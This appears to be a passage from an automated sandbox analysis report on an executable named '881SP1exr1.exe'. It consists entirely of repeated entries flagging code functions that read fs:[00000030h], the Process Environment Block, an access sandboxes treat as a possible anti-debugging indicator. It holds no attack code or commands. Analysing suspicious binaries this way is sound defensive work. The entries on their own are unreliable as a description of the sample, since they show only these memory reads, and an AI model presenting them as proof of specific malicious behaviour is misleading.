Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0142E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0142E3F0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014463FF mov eax, dword ptr fs:[00000030h]	2_2_014463FF
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0140E388 mov eax, dword ptr fs:[00000030h]	2_2_0140E388
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0140E388 mov eax, dword ptr fs:[00000030h]	2_2_0140E388
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0140E388 mov eax, dword ptr fs:[00000030h]	2_2_0140E388
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0143438F mov eax, dword ptr fs:[00000030h]	2_2_0143438F
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0143438F mov eax, dword ptr fs:[00000030h]	2_2_0143438F
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01408397 mov eax, dword ptr fs:[00000030h]	2_2_01408397
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01408397 mov eax, dword ptr fs:[00000030h]	2_2_01408397
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01408397 mov eax, dword ptr fs:[00000030h]	2_2_01408397
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01498243 mov eax, dword ptr fs:[00000030h]	2_2_01498243
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01498243 mov ecx, dword ptr fs:[00000030h]	2_2_01498243
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0140A250 mov eax, dword ptr fs:[00000030h]	2_2_0140A250
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014E625D mov eax, dword ptr fs:[00000030h]	2_2_014E625D
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01416259 mov eax, dword ptr fs:[00000030h]	2_2_01416259
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014CA250 mov eax, dword ptr fs:[00000030h]	2_2_014CA250
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014CA250 mov eax, dword ptr fs:[00000030h]	2_2_014CA250
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01414260 mov eax, dword ptr fs:[00000030h]	2_2_01414260
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01414260 mov eax, dword ptr fs:[00000030h]	2_2_01414260
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01414260 mov eax, dword ptr fs:[00000030h]	2_2_01414260
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0140826B mov eax, dword ptr fs:[00000030h]	2_2_0140826B
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014C0274 mov eax, dword ptr fs:[00000030h]	2_2_014C0274
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014C0274 mov eax, dword ptr fs:[00000030h]	2_2_014C0274
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014C0274 mov eax, dword ptr fs:[00000030h]	2_2_014C0274
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014C0274 mov eax, dword ptr fs:[00000030h]	2_2_014C0274
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014C0274 mov eax, dword ptr fs:[00000030h]	2_2_014C0274
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014C0274 mov eax, dword ptr fs:[00000030h]	2_2_014C0274
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014C0274 mov eax, dword ptr fs:[00000030h]	2_2_014C0274
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014C0274 mov eax, dword ptr fs:[00000030h]	2_2_014C0274
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014C0274 mov eax, dword ptr fs:[00000030h]	2_2_014C0274
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014C0274 mov eax, dword ptr fs:[00000030h]	2_2_014C0274
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014C0274 mov eax, dword ptr fs:[00000030h]	2_2_014C0274
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014C0274 mov eax, dword ptr fs:[00000030h]	2_2_014C0274
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0140823B mov eax, dword ptr fs:[00000030h]	2_2_0140823B
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0141A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0141A2C3
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0141A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0141A2C3
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0141A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0141A2C3
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0141A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0141A2C3
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0141A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0141A2C3
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014E62D6 mov eax, dword ptr fs:[00000030h]	2_2_014E62D6
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014202E1 mov eax, dword ptr fs:[00000030h]	2_2_014202E1
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014202E1 mov eax, dword ptr fs:[00000030h]	2_2_014202E1
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014202E1 mov eax, dword ptr fs:[00000030h]	2_2_014202E1
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144E284 mov eax, dword ptr fs:[00000030h]	2_2_0144E284
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144E284 mov eax, dword ptr fs:[00000030h]	2_2_0144E284
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01490283 mov eax, dword ptr fs:[00000030h]	2_2_01490283
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01490283 mov eax, dword ptr fs:[00000030h]	2_2_01490283
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01490283 mov eax, dword ptr fs:[00000030h]	2_2_01490283
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014202A0 mov eax, dword ptr fs:[00000030h]	2_2_014202A0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014202A0 mov eax, dword ptr fs:[00000030h]	2_2_014202A0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014A62A0 mov eax, dword ptr fs:[00000030h]	2_2_014A62A0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014A62A0 mov ecx, dword ptr fs:[00000030h]	2_2_014A62A0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014A62A0 mov eax, dword ptr fs:[00000030h]	2_2_014A62A0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014A62A0 mov eax, dword ptr fs:[00000030h]	2_2_014A62A0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014A62A0 mov eax, dword ptr fs:[00000030h]	2_2_014A62A0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014A62A0 mov eax, dword ptr fs:[00000030h]	2_2_014A62A0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01418550 mov eax, dword ptr fs:[00000030h]	2_2_01418550
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01418550 mov eax, dword ptr fs:[00000030h]	2_2_01418550
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144656A mov eax, dword ptr fs:[00000030h]	2_2_0144656A
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144656A mov eax, dword ptr fs:[00000030h]	2_2_0144656A
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144656A mov eax, dword ptr fs:[00000030h]	2_2_0144656A
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014A6500 mov eax, dword ptr fs:[00000030h]	2_2_014A6500
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014E4500 mov eax, dword ptr fs:[00000030h]	2_2_014E4500
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014E4500 mov eax, dword ptr fs:[00000030h]	2_2_014E4500
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014E4500 mov eax, dword ptr fs:[00000030h]	2_2_014E4500
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014E4500 mov eax, dword ptr fs:[00000030h]	2_2_014E4500
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014E4500 mov eax, dword ptr fs:[00000030h]	2_2_014E4500
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014E4500 mov eax, dword ptr fs:[00000030h]	2_2_014E4500
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014E4500 mov eax, dword ptr fs:[00000030h]	2_2_014E4500
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01420535 mov eax, dword ptr fs:[00000030h]	2_2_01420535
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01420535 mov eax, dword ptr fs:[00000030h]	2_2_01420535
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01420535 mov eax, dword ptr fs:[00000030h]	2_2_01420535
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01420535 mov eax, dword ptr fs:[00000030h]	2_2_01420535
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01420535 mov eax, dword ptr fs:[00000030h]	2_2_01420535
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01420535 mov eax, dword ptr fs:[00000030h]	2_2_01420535
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0143E53E mov eax, dword ptr fs:[00000030h]	2_2_0143E53E
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0143E53E mov eax, dword ptr fs:[00000030h]	2_2_0143E53E
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0143E53E mov eax, dword ptr fs:[00000030h]	2_2_0143E53E
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0143E53E mov eax, dword ptr fs:[00000030h]	2_2_0143E53E
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0143E53E mov eax, dword ptr fs:[00000030h]	2_2_0143E53E
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144E5CF mov eax, dword ptr fs:[00000030h]	2_2_0144E5CF
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144E5CF mov eax, dword ptr fs:[00000030h]	2_2_0144E5CF
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014165D0 mov eax, dword ptr fs:[00000030h]	2_2_014165D0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0144A5D0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0144A5D0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014125E0 mov eax, dword ptr fs:[00000030h]	2_2_014125E0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0143E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0143E5E7
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0143E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0143E5E7
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0143E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0143E5E7
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0143E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0143E5E7
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0143E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0143E5E7
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0143E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0143E5E7
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0143E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0143E5E7
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0143E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0143E5E7
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144C5ED mov eax, dword ptr fs:[00000030h]	2_2_0144C5ED
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144C5ED mov eax, dword ptr fs:[00000030h]	2_2_0144C5ED
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01412582 mov eax, dword ptr fs:[00000030h]	2_2_01412582
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01412582 mov ecx, dword ptr fs:[00000030h]	2_2_01412582
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01444588 mov eax, dword ptr fs:[00000030h]	2_2_01444588
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144E59C mov eax, dword ptr fs:[00000030h]	2_2_0144E59C
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014905A7 mov eax, dword ptr fs:[00000030h]	2_2_014905A7
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014905A7 mov eax, dword ptr fs:[00000030h]	2_2_014905A7
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014905A7 mov eax, dword ptr fs:[00000030h]	2_2_014905A7
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014345B1 mov eax, dword ptr fs:[00000030h]	2_2_014345B1
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014345B1 mov eax, dword ptr fs:[00000030h]	2_2_014345B1
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144E443 mov eax, dword ptr fs:[00000030h]	2_2_0144E443
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144E443 mov eax, dword ptr fs:[00000030h]	2_2_0144E443
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144E443 mov eax, dword ptr fs:[00000030h]	2_2_0144E443
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144E443 mov eax, dword ptr fs:[00000030h]	2_2_0144E443
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144E443 mov eax, dword ptr fs:[00000030h]	2_2_0144E443
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144E443 mov eax, dword ptr fs:[00000030h]	2_2_0144E443
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144E443 mov eax, dword ptr fs:[00000030h]	2_2_0144E443
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144E443 mov eax, dword ptr fs:[00000030h]	2_2_0144E443
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0143245A mov eax, dword ptr fs:[00000030h]	2_2_0143245A
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014CA456 mov eax, dword ptr fs:[00000030h]	2_2_014CA456
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0140645D mov eax, dword ptr fs:[00000030h]	2_2_0140645D
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0149C460 mov ecx, dword ptr fs:[00000030h]	2_2_0149C460
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0143A470 mov eax, dword ptr fs:[00000030h]	2_2_0143A470
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0143A470 mov eax, dword ptr fs:[00000030h]	2_2_0143A470
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0143A470 mov eax, dword ptr fs:[00000030h]	2_2_0143A470
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01448402 mov eax, dword ptr fs:[00000030h]	2_2_01448402
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01448402 mov eax, dword ptr fs:[00000030h]	2_2_01448402
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01448402 mov eax, dword ptr fs:[00000030h]	2_2_01448402
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0140E420 mov eax, dword ptr fs:[00000030h]	2_2_0140E420
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0140E420 mov eax, dword ptr fs:[00000030h]	2_2_0140E420
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0140E420 mov eax, dword ptr fs:[00000030h]	2_2_0140E420
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0140C427 mov eax, dword ptr fs:[00000030h]	2_2_0140C427
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01496420 mov eax, dword ptr fs:[00000030h]	2_2_01496420
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01496420 mov eax, dword ptr fs:[00000030h]	2_2_01496420
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01496420 mov eax, dword ptr fs:[00000030h]	2_2_01496420
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01496420 mov eax, dword ptr fs:[00000030h]	2_2_01496420
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01496420 mov eax, dword ptr fs:[00000030h]	2_2_01496420
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01496420 mov eax, dword ptr fs:[00000030h]	2_2_01496420
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01496420 mov eax, dword ptr fs:[00000030h]	2_2_01496420
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014104E5 mov ecx, dword ptr fs:[00000030h]	2_2_014104E5
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014CA49A mov eax, dword ptr fs:[00000030h]	2_2_014CA49A
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014164AB mov eax, dword ptr fs:[00000030h]	2_2_014164AB
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014444B0 mov ecx, dword ptr fs:[00000030h]	2_2_014444B0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0149A4B0 mov eax, dword ptr fs:[00000030h]	2_2_0149A4B0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144674D mov esi, dword ptr fs:[00000030h]	2_2_0144674D
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144674D mov eax, dword ptr fs:[00000030h]	2_2_0144674D
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144674D mov eax, dword ptr fs:[00000030h]	2_2_0144674D
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01410750 mov eax, dword ptr fs:[00000030h]	2_2_01410750
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0149E75D mov eax, dword ptr fs:[00000030h]	2_2_0149E75D
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01452750 mov eax, dword ptr fs:[00000030h]	2_2_01452750
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01452750 mov eax, dword ptr fs:[00000030h]	2_2_01452750
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01494755 mov eax, dword ptr fs:[00000030h]	2_2_01494755
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01418770 mov eax, dword ptr fs:[00000030h]	2_2_01418770
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01420770 mov eax, dword ptr fs:[00000030h]	2_2_01420770
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01420770 mov eax, dword ptr fs:[00000030h]	2_2_01420770
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01420770 mov eax, dword ptr fs:[00000030h]	2_2_01420770
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01420770 mov eax, dword ptr fs:[00000030h]	2_2_01420770
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01420770 mov eax, dword ptr fs:[00000030h]	2_2_01420770
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01420770 mov eax, dword ptr fs:[00000030h]	2_2_01420770
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01420770 mov eax, dword ptr fs:[00000030h]	2_2_01420770
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01420770 mov eax, dword ptr fs:[00000030h]	2_2_01420770
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01420770 mov eax, dword ptr fs:[00000030h]	2_2_01420770
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01420770 mov eax, dword ptr fs:[00000030h]	2_2_01420770
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01420770 mov eax, dword ptr fs:[00000030h]	2_2_01420770
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01420770 mov eax, dword ptr fs:[00000030h]	2_2_01420770
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144C700 mov eax, dword ptr fs:[00000030h]	2_2_0144C700
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01410710 mov eax, dword ptr fs:[00000030h]	2_2_01410710
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01440710 mov eax, dword ptr fs:[00000030h]	2_2_01440710
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144C720 mov eax, dword ptr fs:[00000030h]	2_2_0144C720
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144C720 mov eax, dword ptr fs:[00000030h]	2_2_0144C720
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144273C mov eax, dword ptr fs:[00000030h]	2_2_0144273C
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144273C mov ecx, dword ptr fs:[00000030h]	2_2_0144273C
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144273C mov eax, dword ptr fs:[00000030h]	2_2_0144273C
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0148C730 mov eax, dword ptr fs:[00000030h]	2_2_0148C730
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0141C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0141C7C0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014907C3 mov eax, dword ptr fs:[00000030h]	2_2_014907C3
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0149E7E1 mov eax, dword ptr fs:[00000030h]	2_2_0149E7E1
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014327ED mov eax, dword ptr fs:[00000030h]	2_2_014327ED
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014327ED mov eax, dword ptr fs:[00000030h]	2_2_014327ED
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014327ED mov eax, dword ptr fs:[00000030h]	2_2_014327ED
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014147FB mov eax, dword ptr fs:[00000030h]	2_2_014147FB
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014147FB mov eax, dword ptr fs:[00000030h]	2_2_014147FB
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014B678E mov eax, dword ptr fs:[00000030h]	2_2_014B678E
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014C47A0 mov eax, dword ptr fs:[00000030h]	2_2_014C47A0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014107AF mov eax, dword ptr fs:[00000030h]	2_2_014107AF
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0142C640 mov eax, dword ptr fs:[00000030h]	2_2_0142C640
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014D866E mov eax, dword ptr fs:[00000030h]	2_2_014D866E
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014D866E mov eax, dword ptr fs:[00000030h]	2_2_014D866E
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144A660 mov eax, dword ptr fs:[00000030h]	2_2_0144A660
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144A660 mov eax, dword ptr fs:[00000030h]	2_2_0144A660
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01442674 mov eax, dword ptr fs:[00000030h]	2_2_01442674
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0148E609 mov eax, dword ptr fs:[00000030h]	2_2_0148E609
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0142260B mov eax, dword ptr fs:[00000030h]	2_2_0142260B
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0142260B mov eax, dword ptr fs:[00000030h]	2_2_0142260B
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0142260B mov eax, dword ptr fs:[00000030h]	2_2_0142260B
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0142260B mov eax, dword ptr fs:[00000030h]	2_2_0142260B
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0142260B mov eax, dword ptr fs:[00000030h]	2_2_0142260B
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0142260B mov eax, dword ptr fs:[00000030h]	2_2_0142260B
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0142260B mov eax, dword ptr fs:[00000030h]	2_2_0142260B
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01452619 mov eax, dword ptr fs:[00000030h]	2_2_01452619
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01446620 mov eax, dword ptr fs:[00000030h]	2_2_01446620
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01448620 mov eax, dword ptr fs:[00000030h]	2_2_01448620
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0142E627 mov eax, dword ptr fs:[00000030h]	2_2_0142E627
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0141262C mov eax, dword ptr fs:[00000030h]	2_2_0141262C
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0144A6C7
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0144A6C7
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014906F1 mov eax, dword ptr fs:[00000030h]	2_2_014906F1
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014906F1 mov eax, dword ptr fs:[00000030h]	2_2_014906F1
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0148E6F2 mov eax, dword ptr fs:[00000030h]	2_2_0148E6F2
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0148E6F2 mov eax, dword ptr fs:[00000030h]	2_2_0148E6F2
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0148E6F2 mov eax, dword ptr fs:[00000030h]	2_2_0148E6F2
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0148E6F2 mov eax, dword ptr fs:[00000030h]	2_2_0148E6F2
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01414690 mov eax, dword ptr fs:[00000030h]	2_2_01414690
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01414690 mov eax, dword ptr fs:[00000030h]	2_2_01414690
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0144C6A6
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014466B0 mov eax, dword ptr fs:[00000030h]	2_2_014466B0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014E4940 mov eax, dword ptr fs:[00000030h]	2_2_014E4940
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01490946 mov eax, dword ptr fs:[00000030h]	2_2_01490946
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01436962 mov eax, dword ptr fs:[00000030h]	2_2_01436962
